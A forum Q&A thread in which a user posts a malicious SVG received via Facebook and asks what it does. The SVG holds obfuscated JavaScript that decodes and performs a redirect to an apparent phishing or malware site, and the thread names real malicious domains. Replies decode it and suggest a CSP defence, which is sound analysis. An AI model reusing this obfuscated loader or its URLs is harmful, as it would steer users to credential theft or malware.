# Malicious javascript embeded in SVG - what it does?

Tags: javascript, windows, facebook, google-chrome, svg

I recieved facebook message with two files (SVG pictures), and I clicked one of them (I do not know why :( ). Then new tab with red dot opened, and then I was immediately redirected to some site pretending to look like Youtube (`http://kerman.pw/?fb_dsa`).

Then I downloaded the .svg file using the "Save link as..." function. 
It seems it is some javascript code embeeded into svg, so I am posting it here (I do not know JS very well):

```
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function xcxxy(gyqbv,hzrgh,ktjrf){
      var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
      var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"];
      var bnkdip = "";
      var igrqm = 0;
      while(vyqsvo[igrqm]){
        igrqm++;
      }
      var kwwtmh = 0;
      while(gyqbv[kwwtmh]){
        var jikaig = 0;
        var axfnq = -1;
        while(qixua[jikaig]){
          if(qixua[jikaig] == gyqbv[kwwtmh]){
            axfnq = jikaig;
            break;
          }
          jikaig++;
        }
        if(axfnq >= 0){
          var abxnk = 0;
          var wjtfca = -1;
          while(vyqsvo[kwwtmh%igrqm][abxnk]){
            if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){
              wjtfca = abxnk;
              break;
            }
          abxnk++;
          }
          bnkdip += qixua[wjtfca];
        }else{
          bnkdip += gyqbv[kwwtmh];
        }
        kwwtmh++;
      }
      var evhrt = "";
      for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){
        evhrt += bnkdip[izqfrv];
      }
      bnkdip = evhrt;
      return bnkdip;
    }
  var obejok = window;
  var iyysri = xcxxy("sUTA:Gkb106SzH",11,false);
  var leizjp = xcxxy("kBB?5S:Uh",1,false);
  var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false);
  obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false);
  ]]></script>
</svg>
```

I don't really know javascript, and I wanted to ask what it can do. Could it hurt me?
Thank you very much

Comment: Don't you have that "Youtube look alike" in your browser history?

Comment: `window.top.location.href = "http://mourid.com/php/trust.php"`, causing your browser to navigate to that address, which redirects you to various others. The script on its own can't hurt you, but using the site it ultimately takes you to may. Imitating Youtube, it may be trying to phish for your credentials or may try to serve a file that isn't a video.

Comment: @JimmyAdaro yes, I found it. it is: `http://kerman.pw/?fb_dsa` .

Comment: Can I ask why the downvote - so I can  avoid it in the future?

Comment: I also found some information about it, it seem it is new threat.
in English:
https://bartblaze.blogspot.cz/2016/11/nemucod-downloader-spreading-via.html

in Polish (but google translates it well):
https://niebezpiecznik.pl/post/jesli-znajomy-przesle-ci-na-facebooku-zdjecie-nie-otwieraj-go-to-atak/

Comment: FYI - if you serve user-uploaded SVGs from your own domain (which maybe you shouldn't), sending the header `Content-Security-Policy:default-src *;` would say to the browser "you can load scripts, images, or whatever else from any URL you want, but *don't execute inline code in `<script>` tags*". It's a very (probably overly) permissive CSP, but would prevent malicious SVGs from doing damage. See https://content-security-policy.com/

Answer (score 7):

You are correct that the SVG file has embedded javascript.  SVG's are Vector graphic files which will draw a image in the browser based on the instructions inside the file.  The SVG you found contains obfuscated javascript to hide what is actually going on.

At a glance from what I can see, it is a script to open a new browser window and load a new URL, so by itself, it is not dangerous, it all depends on what website it is redirecting you to, and what scripts are set to kick off when you reach the website.

So in short, it CAN harm your computer given the assumption that the site you're being redirected to is malicious.

I hope that helps.